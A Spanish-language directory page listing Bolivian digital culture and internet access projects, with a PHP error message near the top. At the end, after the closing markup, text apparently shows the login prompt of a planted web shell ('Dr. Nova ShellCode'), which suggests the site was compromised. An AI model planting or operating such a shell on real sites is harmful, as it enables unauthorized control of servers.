Bolivia

Error message

Deprecated function: The each() function is deprecated. This message will be suppressed on further calls in menu_set_active_trail() (line 2292 of /var/www/insularesdivergentes.org/includes/menu.inc).

Accesibilidad Bolivia

País: 
Categorías: 

“Accesibilidad Bolivia” empezó hace tres años con el objetivo de entrenar a personas no videntes en el uso de herramientas que les permitan acceder a los beneficios que ofrecen los ordenadores y la red de internet. María Carvajal y Fernando Luna-Pizarro son los promotores de este esfuerzo.

Arsinventing

País: 
Categorías: 

Arsinventing es un proyecto impulsado por Gonzalo Ordóñez en Cochabamba, Bolivia. Si bien el proyecto es joven en edad, no lo es en experiencia.

Festival Cibercepción

País: 

Cibercepción es un festival de  video arte que organiza anualmente Samantha Bryce en Sucre (Bolivia), desde la asociación “Imaginea-Arte y Cultura”  con el apoyo de Hyvos y varias instituciones locales.

Dialectos Digitales

País: 

“Dialectos Digitales” es el festival de Cultura Digital que organizó Oficialía de Culturas de la Alcaldía de La Paz en 2009. Esta experiencia sucede a dos festivales previos (2008 y 2007) de creación digital organizados por la misma institución y coordinados por Daniel Rico.

El Alto WiFi

País: 
Categorías: 

El Alto Wifi es una iniciativa que tiene por objetivo viabilizar el acceso a la conectividad a internet entre los jóvenes habitantes de la ciudad de El Alto, una zona que crece arriba de la ciudad de La Paz sobre los 4 000 msnm.

Elecciones 2.0

País: 
Categorías: 

"Elecciones 2.0 Bolivia" es una plataforma web de participación ciudadana que facilita la cobertura comunitaria de los procesos electorales.

Lucha Libre Boliviana

País: 

En el Alto, arriba de la ciudad de la Paz, hay una tradición muy grande de lucha libre.  En esta práctica lo más saltante es que hay mucha participación de mujeres , conocidas como las "cholitas luchadoras".

Martadero

País: 

mARTadero es un proyecto de resignificación de un antiguo matadero en un barrio marginado en la ciudad de Cochabamba (Bolivia).

Runasimipi

País: 
Categorías: 

Runasimipi es un colectivo integrado por un grupo de voluntarios que busca crear un lugar para las lenguas originarias en las sociedades del futuro, que se sostendrán incrementalmente sobre tecnologías digitales.

Webprende

País: 
Categorías: 

Webprende fue una seguidilla de encuentros y eventos que se realizó en la ciudad de La Paz con el fin de identificar o generar una comunidad de emprendedores en proyectos web.

Subscribe to RSS - Bolivia
<xmp><body></xmp><xmp></body></html></xmp>Dr. Nova Login To Shell

Dr. Nova ShellCode
| Please Password |